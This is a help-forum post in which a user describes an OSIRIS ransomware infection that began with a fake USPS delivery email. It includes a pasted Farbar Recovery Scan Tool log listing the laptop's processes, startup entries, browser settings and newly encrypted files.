Welcome to MalwareRemoval.com,
What if we told you that you could get malware removal help from experts, and that it was 100% free? MalwareRemoval.com provides free support for people with infected computers. Our help, and the tools we use are always 100% free. No hidden catch. We simply enjoy helping others. You enjoy a clean, safe computer.

Malware Removal Instructions

OSIRIS

MalwareRemoval.com provides free support for people with infected computers. Using plain language that anyone can understand, our community of volunteer experts will walk you through each step.

OSIRIS

Unread postby kmorod » January 24th, 2017, 12:42 am

My laptop has been attacked by OSIRIS, all of my files have been encrypted. How do I remove this OSIRIS? I have a back up of my files. I received an email showing the USPS could not deliver a package, please confirm the shipping label. When I tried to open the word document nothing happened. Shortly there after I realized my files were no longer available.

This Encryption attacked my Excel Worksheet files, renames my files to B25EF752--AD38--B401--80219FB4--9BBECE30BBA0 random names and changed the file type from Microsoft Office Excel Worksheets to OSIRIS File

FRST LOGs

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 22-01-2017
Ran by Karen Laptop (administrator) on KARENLAPTOP (22-01-2017 13:08:14)
Running from C:\Users\Karen Laptop\Downloads
Loaded Profiles: Karen Laptop (Available Profiles: Karen Laptop)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: "C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe" -- "%1")
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(HP) C:\Program Files (x86)\HP SimplePass 2011\TrueSuiteService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(APN LLC.) C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe
(HP) C:\Program Files (x86)\HP SimplePass 2011\TouchControl.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(HP) C:\Program Files (x86)\HP SimplePass 2011\BioMonitor.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar3.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP QuickWeb\hpqwutils.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.474\SSScheduler.exe
(APN) C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Hewlett-Packard Development Company L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\HPConnectionManager.exe
(Hewlett-Packard Development Company L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\hpCMSrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Hewlett-Packard Development Company L.P.) C:\Program Files (x86)\Hewlett-Packard\Shared\hpCaslNotification.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
(The Chromium Authors) C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe
(Farbar) C:\Users\Karen Laptop\Downloads\FRST64 (1).exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2799912 2011-06-09] (Synaptics Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1424896 2011-09-08] (IDT, Inc.)
HKLM\...\Run: [SetDefault] => C:\Program Files\Hewlett-Packard\HP LaunchBox\SetDefault.exe [43320 2011-09-30] (Hewlett-Packard Development Company, L.P.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1271168 2012-03-26] (Microsoft Corporation)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [HPQuickWebProxy] => C:\Program Files (x86)\Hewlett-Packard\HP QuickWeb\hpqwutils.exe [169528 2011-10-07] (Hewlett-Packard Company)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [574008 2011-07-11] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HPConnectionManager] => C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\HPCMDelayStart.exe [103992 2011-09-13] (Hewlett-Packard Development Company L.P.)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [ApnTBMon] => C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe [1928776 2016-11-08] (APN)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\Run: [GoogleChromeAutoLaunch_A9391D59E0FAF74C91605C62F75F9E6D] => C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe [666624 2015-07-29] (The Chromium Authors)
HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\Run: [*basllntrba<*>] => "C:\Users\Karen Laptop\AppData\Local\910c7\e8bd5.bat" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\MountPoints2: {6f2ce48b-c7d5-11e1-9d62-80c16e605e00} - G:\LaunchU3.exe -a
HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\MountPoints2: {86d7c927-2971-11e5-99ee-80c16e605e00} - G:\VerizonSWUpgradeAssistantLauncher.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2017-01-01]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.474\SSScheduler.exe (McAfee, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 0.0.0.1 mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{68A8318F-B7B7-4746-BB17-76C936293DCA}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{B8823661-A8E9-43E7-AB76-5B67AC1EA16B}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{CE926AFF-C233-4529-8164-D0B29D9666FF}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID= ... B10E1F1D46
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID= ... B10E1F1D46
HKU\S-1-5-21-3553682965-2478827086-665785291-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID= ... B10E1F1D46
HKU\S-1-5-21-3553682965-2478827086-665785291-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT/1
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {2DD630AA-FBCE-4DFC-8A6E-8BBA8CC65125} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea ... -keywords={searchTerms}
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPNTDF
SearchScopes: HKLM -> {31090377-0740-419E-BEFC-A56E50500D5B} URL =
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Se ... ch?search={searchTerms}
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572 ... html?_nkw={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2DD630AA-FBCE-4DFC-8A6E-8BBA8CC65125} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea ... -keywords={searchTerms}
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Se ... ch?search={searchTerms}
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572 ... html?_nkw={searchTerms}
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> DefaultScope {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {2DD630AA-FBCE-4DFC-8A6E-8BBA8CC65125} URL =
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPNTDF
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {31090377-0740-419E-BEFC-A56E50500D5B} URL = hxxp://search.babylon.com/?q={searchTerms}&affID=113959&tt=060612_6_&babsrc=SP_ss&mntrId=4458beac00000000000008edb9109b45
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Se ... ch?search={searchTerms}
SearchScopes: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572 ... html?_nkw={searchTerms}
BHO: TrueSuite Website Log On -> {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} -> C:\Program Files (x86)\HP SimplePass 2011\x64\IEBHO.dll [2011-08-19] (HP)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO-x32: TrueSuite Website Log On -> {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} -> C:\Program Files (x86)\HP SimplePass 2011\IEBHO.dll [2011-08-19] (HP)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
Toolbar: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Toolbar: HKU\S-1-5-21-3553682965-2478827086-665785291-1000 -> No Name - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - No File
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} hxxps://join-test.webex.com/client/T27L ... atgpc1.cab

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll [2013-09-13] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-05-06] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll [2013-09-13] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\3\NP_wtapp.dll [2013-05-19] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\cgpcfg.dll [2008-08-16] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\CgpCore.dll [2008-08-16] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\confmgr.dll [2008-08-16] ()
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\ctxlogging.dll [2008-08-16] ()
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\ctxmui.dll [2008-08-16] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\icafile.dll [2008-08-16] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\icalogon.dll [2008-08-16] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\msvcm80.dll [2008-05-21] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\msvcp80.dll [2008-05-21] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\msvcr80.dll [2008-05-21] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\npicaN.dll [2008-08-16] ()
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\sslsdk_b.dll [2008-06-05] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Karen Laptop\AppData\Roaming\mozilla\plugins\TcpPServ.dll [2008-08-16] (Citrix Systems, Inc.)

Chrome:
=======
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR DefaultSearchURL: Default -> hxxp://www.search.ask.com/web?q={searchTerms}
CHR DefaultSearchKeyword: Default -> search.ask.com
CHR DefaultSuggestURL: Default -> hxxp://ssmsp.ask.com/query?sstype=prefi ... =ff&q={searchTerms}
CHR Profile: C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default [2017-01-22]
CHR Extension: (Ask Search) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\aaaabibhgjnbdelbcijfciclijhdkgoh [2015-12-04]
CHR Extension: (Google Slides) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-28]
CHR Extension: (Google Docs) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-28]
CHR Extension: (Google Drive) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-28]
CHR Extension: (Website Logon) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfmogjcijkfeahcajecmmegieipfbdcc [2015-11-28]
CHR Extension: (YouTube) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-28]
CHR Extension: (OnlineMapFinder) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccjkfhdggacbjbbolmfgkfocaiccnnbd [2017-01-06]
CHR Extension: (Google Search) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-28]
CHR Extension: (Google Sheets) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-28]
CHR Extension: (Google Docs Offline) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-05-22]
CHR Extension: (Home Tab) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\kofkpgiaknijknhajbhnghkodiccblkg [2016-05-22]
CHR Extension: (FromDocToPDF) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk [2016-10-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
CHR Extension: (Gmail) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-28]
CHR Extension: (Chrome Media Router) - C:\Users\Karen Laptop\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-21]
CHR HKLM\...\Chrome\Extension: [aaaabibhgjnbdelbcijfciclijhdkgoh] - C:\ProgramData\AskPartnerNetwork\Toolbar\Shared\CRX\aaaabibhgjnbdelbcijfciclijhdkgoh.crx [2016-11-09]
CHR HKLM\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3553682965-2478827086-665785291-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [aaaabibhgjnbdelbcijfciclijhdkgoh] - C:\ProgramData\AskPartnerNetwork\Toolbar\Shared\CRX\aaaabibhgjnbdelbcijfciclijhdkgoh.crx [2016-11-09]
CHR HKLM-x32\...\Chrome\Extension: [bfmogjcijkfeahcajecmmegieipfbdcc] - C:\Program Files (x86)\HP SimplePass 2011\tschrome.crx [2011-08-17]
CHR HKLM-x32\...\Chrome\Extension: [kincjchfokkeneeofpeefomkikfkiedl] - C:\Program Files (x86)\OApps\chromeaddon.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [kofkpgiaknijknhajbhnghkodiccblkg] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 APNMCP; C:\Program Files (x86)\AskPartnerNetwork\Toolbar\apnmcp.exe [201800 2016-11-08] (APN LLC.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.474\McCHSvc.exe [329480 2016-12-14] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [12600 2012-03-26] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [291696 2012-03-26] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497392 2016-05-06] (Symantec Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [203888 2012-03-20] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [98688 2012-03-20] (Microsoft Corporation)
U3 GrooveAuditService; no ImagePath
U3 GrooveInstallerService; no ImagePath
S1 ovobkwdb; \??\C:\Windows\system32\drivers\ovobkwdb.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-01-22 13:07 - 2017-01-22 13:07 - 02420736 _____ (Farbar) C:\Users\Karen Laptop\Downloads\FRST64 (1).exe
2017-01-22 13:04 - 2017-01-22 13:08 - 00023070 _____ C:\Users\Karen Laptop\Downloads\FRST.txt
2017-01-22 13:04 - 2017-01-22 13:05 - 00017576 _____ C:\Users\Karen Laptop\Downloads\Addition.txt
2017-01-22 13:03 - 2017-01-22 13:04 - 00000000 ____D C:\FRST
2017-01-22 13:03 - 2017-01-22 13:03 - 02420736 _____ (Farbar) C:\Users\Karen Laptop\Downloads\FRST64.exe
2017-01-22 13:02 - 2017-01-22 13:03 - 01762816 _____ (Farbar) C:\Users\Karen Laptop\Downloads\FRST.exe
2017-01-22 07:53 - 2017-01-22 07:53 - 00163652 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--80219FB4--9BBECE30BBA0.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00058692 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--9E950C1E--192F8B3A905A.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00047059 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--B060E460--C1AC71CF5152.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00034628 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--94F96ECD--7F70878AC416.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00026948 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--F1AC1582--EE92E9E668FA.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00015950 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--9D27223D--D189627EAC64.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00014292 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--B89F2E61--0B6490683E26.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00012486 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--22C0AAD2--FBCD5FCB8A18.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00011868 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--33C305DF--B31BB3D3BB33.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00011709 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--734137D2--1A6CFE3C6325.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00009610 _____ C:\Users\Karen Laptop\Documents\OSIRIS-35c4.htm
2017-01-22 07:53 - 2017-01-22 07:53 - 00009610 _____ C:\Users\Karen Laptop\Desktop\OSIRIS-2a43.htm
2017-01-22 07:52 - 2017-01-22 07:52 - 00000000 ____D C:\Users\Karen Laptop\AppData\Local\910c7
2017-01-01 12:51 - 2017-01-01 12:51 - 00001964 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
2017-01-01 12:51 - 2017-01-01 12:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-01-22 12:58 - 2009-07-13 21:13 - 00784670 _____ C:\Windows\system32\PerfStringBackup.INI
2017-01-22 12:58 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\inf
